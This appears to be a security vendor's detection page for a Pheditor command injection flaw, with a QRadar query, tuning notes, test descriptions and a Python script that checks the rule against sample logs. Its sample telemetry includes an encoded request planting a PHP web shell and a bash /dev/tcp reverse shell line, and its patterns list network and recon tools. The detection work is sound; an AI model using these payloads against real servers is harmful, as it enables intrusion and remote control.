
Detect Pheditor OS Command Injection via Unsanitized 'dir' Parameter (CVE-2026-48030) in IBM QRadar

Detects exploitation of CVE-2026-48030, a critical OS command injection vulnerability in Pheditor versions 2.0.1 through 2.0.3. The terminal handler passes the unsanitized 'dir' request parameter directly into a shell command, so any attacker who can reach the handler, authenticated or not, can execute arbitrary OS commands on the hosting server under the web server's service account. A public proof-of-concept exists, so active exploitation should be expected.

MITRE ATT&CK

Tactic
Execution, Persistence, Privilege Escalation, Lateral Movement

QRadar Detection Query

IBM QRadar (QRadar)
SELECT
  DATEFORMAT(devicetime, 'yyyy-MM-dd HH:mm:ss') AS event_time,
  sourceip,
  destinationip,
  destinationport,
  "URL",
  "username",
  QIDNAME(qid) AS event_name,
  LOGSOURCENAME(logsourceid) AS log_source,
  CATEGORYNAME(category) AS category_name
FROM events
WHERE
  LOGSOURCETYPENAME(devicetype) IN ('Apache HTTP Server', 'NGINX', 'PHP', 'Linux OS')
  AND (
    (
      "URL" ILIKE '%pheditor%'
      AND (
        "URL" IMATCHES '.*[?&]dir=[^&]*(%26|%7C|%3B|%60|%24%28|[;|`]).*'
        OR "URL" IMATCHES '.*(whoami|wget|curl|bash|nslookup|sh(%20|[+])-c|/tmp/|%2Ftmp%2F).*'
      )
    )
    OR (
      "Process Name" IMATCHES '(.*/)?(sh|bash|dash|zsh)'
      AND "Parent Process Name" IMATCHES '(.*/)?(php.*|apache2|httpd|nginx)'
      AND "Command" IMATCHES '.*((?<![A-Za-z0-9_-])(whoami|id|uname|wget|curl|nc|chmod)(?![A-Za-z0-9_.-])|cat +/etc/|/dev/tcp/).*'
    )
  )
ORDER BY devicetime DESC
LAST 1 HOURS
Severity: critical
Confidence: medium

QRadar AQL query detecting exploitation of the Pheditor terminal handler on two branches: HTTP requests to a pheditor path whose dir parameter carries a shell metacharacter (raw or percent-encoded) or a recon/download token, and process events in which a shell runs under a PHP or web-server parent with such a token on its command line. Two caveats for anyone adapting it. First, % is the LIKE wildcard in AQL, so percent-encoded bytes such as %3B or %26 have to be matched with MATCHES/IMATCHES (a full-string Java regex) rather than ILIKE; an ILIKE pattern like '%dir=%26%' also fires on any dir value that merely contains the digits 26. Second, "URL", "Process Name", "Parent Process Name" and "Command" are custom event properties that must be extracted for the Apache/NGINX and Linux OS (auditd) log sources, otherwise the corresponding branch never returns rows.

Data Sources

  • QRadar SIEM
  • Apache/NGINX log sources
  • Linux OS log sources

Required Tables

events

False Positives & Tuning

  • Legitimate developers using Pheditor terminal with URL-encoded directory paths containing special characters
  • PHP applications that spawn shell processes for legitimate operational purposes
  • Security scanners generating request patterns that match injection signatures
  • Internal penetration testing activities against the web application

Testing Methodology

Validate this detection against 4 adversary techniques from Atomic Red Team. Each test below lists the behaviour to exercise and the telemetry you should expect to see. Executable commands and cleanup steps are available with Pro.

  1. Test 1: Basic whoami Injection via dir Parameter

    Expected signal: Web server access log entry showing request URI containing '%3B' and 'whoami'. Auditd EXECVE record for /usr/bin/whoami with parent process php-fpm or apache2 and uid matching the web server service account.

  2. Test 2: Out-of-Band Data Exfiltration via DNS Lookup

    Expected signal: DNS query from web server IP to attacker-controlled domain visible in DNS server logs and network flow data. Auditd record for nslookup or dig process spawned under web server account. NetworkConnect events from DeviceNetworkEvents to the external DNS resolver.

  3. Test 3: Web Shell Implantation via Piped Command Chain

    Expected signal: Auditd OPENAT/CREATE syscall for /var/www/html/shell.php attributed to web server service account. File creation event in EDR telemetry (DeviceFileEvents or equivalent) with InitiatingProcessFileName=php/apache2 and FileName=shell.php. Web server access log entry with %7C in the dir parameter.

  4. Test 4: Reverse Shell via Bash TCP Redirect

    Expected signal: Auditd EXECVE for bash with arguments '-i' and '/dev/tcp/ATTACKER_LAB_IP/4444' under web server parent process. Outbound TCP connection from web server to attacker lab IP on port 4444 in network flow logs. DeviceNetworkEvents entry from the EDR showing the connection establishment.
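
The two branches of the detection above (the web-request branch and the process-execution branch described under the query, and exercised by the four tests) can be modelled offline so the matching logic is checked before it is pushed to the SIEM. The following is an added example, not code from the detection page or from the Pheditor project. It parses constructed Apache combined-log lines, percent-decodes the dir parameter before looking for shell metacharacters (the reason ILIKE cannot be used for encoded payloads), and applies the process branch to constructed events already normalized to the "Process Name", "Parent Process Name" and "Command" properties the AQL references. The token lists are the page's, with two labelled additions (nslookup for Test 2, /dev/tcp/ for Test 4); the IPs, paths and commands in the sample telemetry are constructed.

```python
"""Offline model of the two branches of the QRadar rule for CVE-2026-48030,
applied to constructed Apache access-log lines and constructed process events
normalized to the "Process Name" / "Parent Process Name" / "Command" properties
the AQL query references. Added example, not code from the detection page."""
import re
from posixpath import basename
from urllib.parse import parse_qs, unquote, urlsplit

# Characters that turn a directory path into a command chain once it reaches a shell.
SHELL_META = re.compile(r"[;&|`]|\$\(")
# Recon, download and staging markers; only meaningful inside a pheditor request.
# nslookup is an addition here so the page's Test 2 (DNS exfil) is covered.
URL_TOKENS = re.compile(r"\b(whoami|wget|curl|bash|nslookup)\b|\bsh -c\b|/tmp/|/dev/tcp/", re.I)
# Combined log prefix: client ident user [time] "METHOD URI PROTO" status
ACCESS_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<uri>\S+) \S+" (?P<status>\d{3})')

SHELLS = {"sh", "bash", "dash", "zsh"}
WEB_PARENTS = {"apache2", "httpd", "nginx"}
# Word-bounded, unlike ILIKE '%id %' which also hits 'pid ' or 'uuid '. The /dev/tcp/
# marker is an addition here so that the page's Test 4 reverse shell is covered.
CMD_TOKENS = re.compile(
    r"(?<![\w-])(whoami|id|uname|wget|curl|nc|chmod)(?![\w.-])|\bcat\s+/etc/|/dev/tcp/", re.I)


def inspect_request(line):
    """Web branch. Returns None for non-pheditor requests, otherwise a finding whose
    'alert' is True when the decoded dir value contains a shell metacharacter or the
    decoded URI carries a recon/download token. Decoding first matters: in a LIKE
    pattern '%3B' means 'anything, then 3B', so encoded bytes cannot be LIKE-matched."""
    m = ACCESS_RE.match(line)
    if not m or "pheditor" not in m.group("uri").lower():
        return None
    uri = m.group("uri")
    dirs = parse_qs(urlsplit(uri).query, keep_blank_values=True).get("dir", [])  # percent-decoded
    metachars = sorted({c for d in dirs for c in SHELL_META.findall(d)})
    tokens = sorted({t.group(0).lower() for t in URL_TOKENS.finditer(unquote(uri))})
    return {"source": m.group("src"), "dir": dirs, "metachars": metachars,
            "tokens": tokens, "alert": bool(metachars or tokens)}


def inspect_process(ev):
    """Process branch: a shell whose parent is PHP or the web server, with a recon,
    download, staging or reverse-shell token on its command line."""
    proc = basename(ev.get("Process Name", "")).lower()
    parent = basename(ev.get("Parent Process Name", "")).lower()
    under_php = parent.startswith("php") or parent in WEB_PARENTS
    if proc not in SHELLS or not under_php:
        return {"alert": False, "process": proc, "parent": parent, "hits": []}
    hits = sorted({h.group(0).lower() for h in CMD_TOKENS.finditer(ev.get("Command", ""))})
    return {"alert": bool(hits), "process": proc, "parent": parent, "hits": hits}


def run(access_log, process_events):
    """Apply both branches and return the alerting findings tagged with their branch."""
    alerts = [("web", f) for f in map(inspect_request, access_log) if f and f["alert"]]
    alerts += [("process", f) for f in map(inspect_process, process_events) if f["alert"]]
    return alerts


# Constructed sample telemetry mirroring the page's validation tests (IPs are TEST-NET).
ACCESS_LOG = [
    # Test 1: ';whoami' appended to the directory, URL-encoded
    '203.0.113.10 - - [05/Mar/2026:10:15:02 +0000] "GET /pheditor/?terminal=1&dir=%2Fvar%2Fwww%3Bwhoami HTTP/1.1" 200 312',
    # Test 3: pipe into an echo that writes shell.php
    '203.0.113.10 - - [05/Mar/2026:10:15:40 +0000] "GET /pheditor/?dir=%2Fvar%2Fwww%7Cecho%20%27%3C%3Fphp%20system%28%24_GET%5Bc%5D%29%3B%27%3Eshell.php HTTP/1.1" 200 98',
    # Benign: directory name containing '26'; ILIKE '%dir=%26%' fires on this, the decoder does not
    '198.51.100.7 - - [05/Mar/2026:10:16:11 +0000] "GET /pheditor/?dir=%2Fvar%2Fwww%2Fproject26 HTTP/1.1" 200 2048',
    # Unrelated application: out of scope for the rule
    '198.51.100.8 - - [05/Mar/2026:10:16:30 +0000] "GET /wp-admin/?dir=..%3B HTTP/1.1" 302 0',
]
PROCESS_EVENTS = [
    # Test 1: shell spawned by php-fpm running the injected whoami
    {"Process Name": "/usr/bin/sh", "Parent Process Name": "php-fpm8.2", "Command": "sh -c 'cd /var/www;whoami'"},
    # Test 4: bash reverse shell over /dev/tcp under the same parent
    {"Process Name": "/bin/bash", "Parent Process Name": "php-fpm8.2", "Command": "bash -i >& /dev/tcp/203.0.113.10/4444 0>&1"},
    # Benign: curl from a cron job, not under PHP
    {"Process Name": "/bin/sh", "Parent Process Name": "cron", "Command": "sh -c 'curl -s http://127.0.0.1/health'"},
    # Benign PHP child: 'pidfiles' must not satisfy the 'id' token
    {"Process Name": "/bin/sh", "Parent Process Name": "php-fpm8.2", "Command": "sh -c 'ls -l /var/www/pidfiles'"},
]

if __name__ == "__main__":
    for branch, finding in run(ACCESS_LOG, PROCESS_EVENTS):
        print(branch, finding)
```

Running the script prints the two web findings (Tests 1 and 3) and the two process findings (Tests 1 and 4) and stays silent on the project26 request and the cron and pidfiles events, which is exactly the separation the False Positives section asks for. The same decode-then-match discipline applies when the rule is ported to another SIEM: match encoded bytes with a regex or decode the URL first, never with a LIKE pattern whose wildcard character is %.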
